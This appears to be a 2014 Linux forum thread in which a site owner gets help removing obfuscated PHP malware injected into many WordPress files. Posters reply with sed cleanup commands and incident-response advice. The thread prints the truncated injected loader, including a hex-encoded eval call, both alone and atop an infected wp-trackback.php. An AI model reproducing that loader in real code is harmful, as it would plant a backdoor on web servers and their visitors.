Help removing php injected code

GoofySmurf · 07-29-2014, 12:46 PM

Hello

Recently we had massive php code injected on most of our wordpress sites. I am trying to remove the code but there are a few thousand php files. On most of the sites I just replace the top line with the php tag again but this does not work on all the sites.

The command I use is:

find . -name "*.php" -exec sed -i '1 s/.*/<?php/' '{}' \;

My only solution would be to remove the offending code that was injected but can not for the life of me figure it out.

Below is the string I need to remove

Code:

<?php $tyyqpbrwjq = '6*CW&)7gj6<.[A%x5c%x7827&6<%x#N#*%x5c%x7824%x5c%x782f%x5c%x7825kj>>*4-1-
bubE{h%x5c%x7825)sutcvt)!gj!|!*bubE{h%x5c%x7825)jpp3)%x5c%x7825cB%x5c%x5c%x785c1^-%x5c%x7^W%x5c%x78
25c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5c%x7825c825)ppde>u%x5c%x7825V<#65,47R25,d7R17825:-t%x5c%x782
5)3of:opjudovg<~%x5c%x)!>>%x5c%x7822!ftmbg)!gj%x7825-#1]#-
bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*9!%x5c%x7827!hmg%x55c%x7827u%x5c%x7825)7fmji%x5c%x78786<C%x5c%
x7827&6<*rfx5c%x7825Z<^2%x5c%x785c2b%x5c%x7825!>!2p%x5c%x7825!*3!<**qp%x5c%x7825!-uyfu%x5c%x78273:8
(..)epreg_replaceebdkabappx'; $auobcvnlfq = explode(chr((204-160)),'8482,58,5140,45,7992,50,8368,51
,43,2719,33,8341,27,9760,57,1148,25,1710,40,750,61,2775,53,5366,36,2503,44,6603,66,3475,36,6484,50,
(..); if (!function_exists('pliyupuqyg')) { function pliyupuqyg($qxsysxwnvl, $nlerhlrclx) { $nrygpq
onlc = NULL; for($ipdahrsiab=0;$ipdahrsiab<(sizeof($qxsysxwnvl)/2);$ipdahrsiab++) { $nrygpqonlc .= 
substr($nlerhlrclx, $qxsysxwnvl[($ipdahrsiab*2)],$qxsysxwnvl[($ipdahrsiab*2)+1]); } return $nrygpqo
nlc; };} $fsfynqhavn="\x20\57\x2a\40\x70\157\x68\160\x76\153\x70\151\x6c\147\x20\52\x2f\40\x65\166\
x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x31\62\x30\55\x38\63
(..) NULL); $wwbtewlrap=$fsfynqhavn; $wwbtewlrap=(821-700); $tyyqpbrwjq=$wwbtewlrap-1; ?>

Any assistance will be appreciated.

szboardstretcher · 07-29-2014, 12:51 PM

That sucks. This is why I don't like wordpress.

Anyway, if you want to remove that section from a file, and it is the same in every file, then:

Code:

sed -i '/<?php $tyyqpbrwjq/,/$wwbtewlrap-1; ?>/d'

will get rid of it from a file for you.

Habitual · 07-29-2014, 01:00 PM

How'd the code get there is the real question.

GoofySmurf · 07-29-2014, 01:14 PM

Yup the long and thorough investigation will start as soon as i remove this injected code :P

Thank you for the reply and command but it does not seem to work

I am running the following command:

find . -name "*.php" -exec sed -i '/<?php $tyyqpbrwjq/,/$wwbtewlrap-1; ?>/d' '{}' \;

The command seems to delete all the content of the file.

PS: Im quite a noob with sed and find and only manage to construct my first command from other examples online.

astrogeek · 07-29-2014, 01:30 PM

Quote:

Originally Posted by Habitual

How'd the code get there is the real question.

That is indeed the question!

While not an expert, I have had recent opportunity to do a little forensic work of my own on a couple of
similarly corrupted sites.

Here are some thoughts that come immediately to mind:

0. Take the sites offline immediately... put up a "Temporarily unavailable..." page to handle ALL http
requests until resolved - otherwise you may be playing real-time cat and mouse. Change ALL passwords
immediately - FTP accounts, Wordpress, CPanel (or other UI), emails, database... everything -
before you begin!

1. Secure all logs and a complete snapshot of the server to a local platform if you intend to do any
forensics (highly recommended)!

2. There will be an original vector not apparent from the modified files. You may (or may not) be able to
identify it by reviewing the server logs. Typically there will have been multiple stages leading to the
currently visible code, some of which will have been removed already.

3. Simply removing the visibly affected code from files will not allow you to clean up the site(s). There
will be additional vectors installed from which they will simply re-install, ad infinitum. The ONLY way
to clean it up short of a total reinstall will be if you have a clean backup stored offsite from which to
identify and restore files. A simple restore from recent backup will not get rid of it if the backup contains
a vector - very likely for any recent backup.

It will be very difficult to simply clean it up, and virtually impossible to know with any confidence that
you have gotten everything. If you try to simply sed the code as described they will be back!

They currently own your site and the only way to confidently evict them is to wipe it down to the metal and
reinstall from clean sources... sorry to say, but mostly the truth in my limited but painful experience.

szboardstretcher · 07-29-2014, 01:33 PM

Must have done something incorrect. Here is my example, using this very page:

Code:

#Get this page into TESTFILE
wget -O TESTFILE http://www.linuxquestions.org/questi...7/#post5211483

#Grep and count the instances of 'tyy' which is in that code mentioned...
grep tyy TESTFILE|wc -l
3

#Find the TESTFILE and run sed on it to remove the code...
find . -name "TESTFILE" -exec sed -i '/<?php $tyyqpbrwjq/,/$wwbtewlrap-1; ?>/d' '{}' \;

#Grep and count the instances of 'tyy' again
grep tyy TESTFILE|wc -l
0

#Grep number of lines the letter 'p' is in TESTFILE now (indicating that it did not delete everything
grep p TESTFILE|wc -l
489

GoofySmurf · 07-29-2014, 01:40 PM

Quote:

Originally Posted by astrogeek

That is indeed the question!

While not an expert, I have had recent opportunity to do a little forensic work of my own on a couple of
similarly corrupted sites.

Here are some thoughts that come immediately to mind:

0. Take the sites offline immediately... put up a "Temporarily unavailable..." page to handle ALL http
requests until resolved - otherwise you may be playing real-time cat and mouse. Change ALL passwords
immediately - FTP accounts, Wordpress, CPanel (or other UI), emails, database... everything -
before you begin!

1. Secure all logs and a complete snapshot of the server to a local platform if you intend to do any
forensics (highly recommended)!

2. There will be an original vector not apparent from the modified files. You may (or may not) be able to
identify it by reviewing the server logs. Typically there will have been multiple stages leading to the
currently visible code, some of which will have been removed already.

3. Simply removing the visibly affected code from files will not allow you to clean up the site(s). There
will be additional vectors installed from which they will simply re-install, ad infinitum. The ONLY way
to clean it up short of a total reinstall will be if you have a clean backup stored offsite from which to
identify and restore files. A simple restore from recent backup will not get rid of it if the backup contains
a vector - very likely for any recent backup.

It will be very difficult to simply clean it up, and virtually impossible to know with any confidence that
you have gotten everything. If you try to simply sed the code as described they will be back!

They currently own your site and the only way to confidently evict them is to wipe it down to the metal and
reinstall from clean sources... sorry to say, but mostly the truth in my limited but painful experience.

Thank you for the advice the effected server is already disconnected from the net and the sites was moved to another brand new debian 7 web server, the reason I am trying to clean the visible code from the sites is just to get them up and running in the mean time while the developers can comb through the sites code.

You are correct that 6 months worth of backups does have similar code popping up on some pages.

I understand what you are saying but it will be a quick fix to at-least maintain some form of uptime while it can be properly fixed.

GoofySmurf · 07-29-2014, 02:21 PM

Quote:

Originally Posted by szboardstretcher

Must have done something incorrect. Here is my example, using this very page:

Code:

#Get this page into TESTFILE
wget -O TESTFILE http://www.linuxquestions.org/questi...7/#post5211483

#Grep and count the instances of 'tyy' which is in that code mentioned...
grep tyy TESTFILE|wc -l
3

#Find the TESTFILE and run sed on it to remove the code...
find . -name "TESTFILE" -exec sed -i '/<?php $tyyqpbrwjq/,/$wwbtewlrap-1; ?>/d' '{}' \;

#Grep and count the instances of 'tyy' again
grep tyy TESTFILE|wc -l
0

#Grep number of lines the letter 'p' is in TESTFILE now (indicating that it did not delete everything
grep p TESTFILE|wc -l
489

It does work if I test it the way you did as well but if i run it against lets say wp-trackback.php it emties the file:

Here is the code for wp-trackback.php

Code:

<?php (..) if (!function_exists('pliyupuqyg')) { function pliyupuqyg($qxsysxwnvl, $nlerhlrclx) { $nrygpqonlc = NULL; 
for($ipdahrsiab=0;$ipdahrsiab<(sizeof($qxsysxwnvl)/2);$ipdahrsiab++) { $nrygpqonlc .= substr($nlerhlrclx, $qxsysxwnvl
[($ipdahrsiab*2)],$qxsysxwnvl[($ipdahrsiab*2)+1]); } return $nrygpqonlc; };} $fsfynqhavn="\x20\57\x2a\40\x70\157\x68
\160\x76\153\x70\151\x6c\147\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x
68\162\x28\50\x31\62\x30\55\x38\63\x29\51\x2c\40\x63\150\x72\50\x28\64\x35\71\x2d\63\x36\67\x29\51\x2c\40\x70\154\x6
9\171\x75\160\x75\161\x79\147\x28\44\x61\165\x6f\142\x63\166\x6e\154\x66\161\x2c\44\x74\171\x79\161\x70\142\x72\167\
x6a\161\x29\51\x29\73\x20\57\x2a\40\x63\166\x79\165\x71\144\x75\171\x76\172\x20\52\x2f\40"; $wwbtewlrap=substr($tyyq
pbrwjq,(62760-52647),(59-47)); $wwbtewlrap($kyptwpgzbr, $fsfynqhavn, NULL); $wwbtewlrap=$fsfynqhavn; $wwbtewlrap=(8
21-700); $tyyqpbrwjq=$wwbtewlrap-1; ?><?php
/**
 * Handle Trackbacks and Pingbacks sent to WordPress
 *
 * @package WordPress
 */

if (empty($wp)) {
	require_once('./wp-load.php');
	wp( array( 'tb' => '1' ) );
}

/**
 * trackback_response() - Respond with error or success XML message
 *
 * @param int|bool $error Whether there was an error
 * @param string $error_message Error message if an error occurred
 */
function trackback_response($error = 0, $error_message = '') {
	header('Content-Type: text/xml; charset=' . get_option('blog_charset') );
	if ($error) {
		echo '<?xml version="1.0" encoding="utf-8"?'.">\n";
		echo "<response>\n";
		echo "<error>1</error>\n";
		echo "<message>$error_message</message>\n";
		echo "</response>";
		die();
	} else {
		echo '<?xml version="1.0" encoding="utf-8"?'.">\n";
		echo "<response>\n";
		echo "<error>0</error>\n";
		echo "</response>";
	}
}

// trackback is done by a POST
$request_array = 'HTTP_POST_VARS';

if ( !isset($_GET['tb_id']) || !$_GET['tb_id'] ) {
	$tb_id = explode('/', $_SERVER['REQUEST_URI']);
	$tb_id = intval( $tb_id[ count($tb_id) - 1 ] );
}

$tb_url  = isset($_POST['url'])     ? $_POST['url']     : '';
$charset = isset($_POST['charset']) ? $_POST['charset'] : '';

// These three are stripslashed here so that they can be properly escaped after mb_convert_encoding()
$title     = isset($_POST['title'])     ? stripslashes($_POST['title'])      : '';
$excerpt   = isset($_POST['excerpt'])   ? stripslashes($_POST['excerpt'])    : '';
$blog_name = isset($_POST['blog_name']) ? stripslashes($_POST['blog_name'])  : '';

if ($charset)
	$charset = str_replace( array(',', ' '), '', strtoupper( trim($charset) ) );
else
	$charset = 'ASCII, UTF-8, ISO-8859-1, JIS, EUC-JP, SJIS';

// No valid uses for UTF-7
if ( false !== strpos($charset, 'UTF-7') )
	die;

if ( function_exists('mb_convert_encoding') ) { // For international trackbacks
	$title     = mb_convert_encoding($title, get_option('blog_charset'), $charset);
	$excerpt   = mb_convert_encoding($excerpt, get_option('blog_charset'), $charset);
	$blog_name = mb_convert_encoding($blog_name, get_option('blog_charset'), $charset);
}

// Now that mb_convert_encoding() has been given a swing, we need to escape these three
$title     = $wpdb->escape($title);
$excerpt   = $wpdb->escape($excerpt);
$blog_name = $wpdb->escape($blog_name);

if ( is_single() || is_page() )
	$tb_id = $posts[0]->ID;

if ( !isset($tb_id) || !intval( $tb_id ) )
	trackback_response(1, 'I really need an ID for this to work.');

if (empty($title) && empty($tb_url) && empty($blog_name)) {
	// If it doesn't look like a trackback at all...
	wp_redirect(get_permalink($tb_id));
	exit;
}

if ( !empty($tb_url) && !empty($title) ) {
	header('Content-Type: text/xml; charset=' . get_option('blog_charset') );

	if ( !pings_open($tb_id) )
		trackback_response(1, 'Sorry, trackbacks are closed for this item.');

	$title =  wp_html_excerpt( $title, 250 ).'...';
	$excerpt = wp_html_excerpt( $excerpt, 252 ).'...';

	$comment_post_ID = (int) $tb_id;
	$comment_author = $blog_name;
	$comment_author_email = '';
	$comment_author_url = $tb_url;
	$comment_content = "<strong>$title</strong>\n\n$excerpt";
	$comment_type = 'trackback';

	$dupe = $wpdb->get_results( $wpdb->prepare("SELECT * FROM $wpdb->comments WHERE comment_post_ID = %d AND comment_author_url = %s", $comment_post_ID, $comment_author_url) );
	if ( $dupe )
		trackback_response(1, 'We already have a ping from that URL for this post.');

	$commentdata = compact('comment_post_ID', 'comment_author', 'comment_author_email', 'comment_author_url', 'comment_content', 'comment_type');

	wp_new_comment($commentdata);

	do_action('trackback_post', $wpdb->insert_id);
	trackback_response(0);
}
?>

and this is the command I run:

Code:

find . -name "wp-trackback.php" -exec sed -i '/<?php $tyyqpbrwjq/,/$wwbtewlrap-1; ?>/d' '{}' \;

szboardstretcher · 07-29-2014, 02:32 PM

Ok. Thanks for the actual code. You would need this to clear out that single enourmous line, without affecting your leading php statement:

Code:

sed 's/<?php $tyyqpbrwjq.*$wwbtewlrap-1; ?>//' PHPFILE

Test her out and see what you think.

GoofySmurf · 07-29-2014, 02:46 PM

Quote:

Originally Posted by szboardstretcher

Ok. Thanks for the actual code. You would need this to clear out that single enourmous line, without affecting your leading php statement:

Code:

sed 's/<?php $tyyqpbrwjq.*$wwbtewlrap-1; ?>//' PHPFILE

Test her out and see what you think.

I humbly thank you for all your time and effort spend to assist me. I finally have it working and for interest sake here is the command I use.

Code:

find . -name "*.php" -exec sed -i 's/<?php $tyyqpbrwjq.*$wwbtewlrap-1; ?>//' '{}' \;

salasi · 07-29-2014, 04:45 PM

You might want to check this out; it is one of several recent WP vulns.

Here's a quote

"To be clear, the MailPoet vulnerability is the entry point, it doesn't mean your website has to have it enabled or that you have it on the website; if it resides on the server, in a neighbouring website, it can still affect your website."

Of course, given that there are a few Wordpress vulns means that this may or may not be your vuln, but it is worth checking out.

sundialsvcs · 07-30-2014, 09:20 AM

Obviously, you need to beef-up the security of these boxes. (If you're using "easy, convenient" computer-management software such as Plesk, that's almost certainly how they got in.)

Then, you need to be able to have the "authoritative" source-code of the entire site in a version-control system somewhere ... somewhere else, including several physical backups in a safe-box somewhere ... by which you can restore the system by "checking-out" the correct branch from the repository on top of the corrupted code that is there. Presto! The source-code control system (say, "git") will automatically resynchronize everything to match this known-good state ... removing files that were added and replacing ones that were changed.

You need this very-fundamental capability for any and every system that you manage ... to deal with any sort of problem, including your own

"oops."

(Nothing makes a computer-guy's blood run cold, than to hear someone nearby say, "oops ..." in that certain hollow tone of voice ... And nothing makes him feel better than to know, with certainty, that the mistake, whatever it was, can be reversed with a simple "Shazam!")

GoofySmurf · 07-31-2014, 02:42 AM

Quote:

Originally Posted by sundialsvcs

Obviously, you need to beef-up the security of these boxes. (If you're using "easy, convenient" computer-management software such as Plesk, that's almost certainly how they got in.)

Then, you need to be able to have the "authoritative" source-code of the entire site in a version-control system somewhere ... somewhere else, including several physical backups in a safe-box somewhere ... by which you can restore the system by "checking-out" the correct branch from the repository on top of the corrupted code that is there. Presto! The source-code control system (say, "git") will automatically resynchronize everything to match this known-good state ... removing files that were added and replacing ones that were changed.

You need this very-fundamental capability for any and every system that you manage ... to deal with any sort of problem, including your own

"oops."

(Nothing makes a computer-guy's blood run cold, than to hear someone nearby say, "oops ..." in that certain hollow tone of voice ... And nothing makes him feel better than to know, with certainty, that the mistake, whatever it was, can be reversed with a simple "Shazam!")

We dont use any control panels for our hosting or common passwords. All the passwords are 52 character with punctuation marks mixed in-between.

Thanks for the recommendation I never considered backing up client wp sites with git, its actually a great idea thanks

sundialsvcs · 07-31-2014, 07:28 PM

Git (version-control ...) should be a fundamental part of your "deployment" process. Within your own shop, you have a master repository ... replicated many places constantly, including some that are offline ... and this is where the crown-jewels are stored.

Every client site contains a duplicate repository (which is "pulled," but never "pushed") which cannot be written-to by anyone. At any time, this repo can be pulled from the master, and the site files can then be brought to their correct deployed-state by switching to the client's deployment-master branch and pulling at a specified tag.

This should be done by a single "maintenance" user-id (which is not root ...), which owns all of the released files and which write-protects all of them (as well as the directories). No files can be altered, added, or removed, unless you break into root or that particular user. And the only way to "ssh" into that user is through possession of the correct private key, which only your deployment-team possesses. (Passwords can't be used to ssh into anything anywhere, in fact.)

A lot of the trick of "pragmatic web-server security" is simply taking the necessary precautions that make your systems "not trivially-easy to get into." Most web-site intruders are strictly opportunists. If they encounter even a slightly-locked door or window, they'll just move on to the next house. Fact is, most systems out there are "trivially easy to break into!" (You really don't have to "break" a window if it's open, now do you?)

unSpawn · 08-01-2014, 12:51 AM

Over the years I've advocated a specific approach to handling security incidents in which what to do afterwards has its place but only after we've ensured the OP has mitigated the risks, has investigated the breach where possible and has shown an understanding of what was missing security posture-wise. The use of versioning is nice but it does not prevent anything security-related. And to launch into a description extolling its virtues seems rather premature and distracting when the OP has not yet shown he has a grip on basic system and application security (and still appears to want to expose a system after cleaning it up). So thinking like a coder in my humble opinion is nice but now is not the time for it: first things first I'd say.

@OP: since you have shown this started about six months ago: what item or items have you isolated as the source of the infection and what are the exact measures you take to combat this?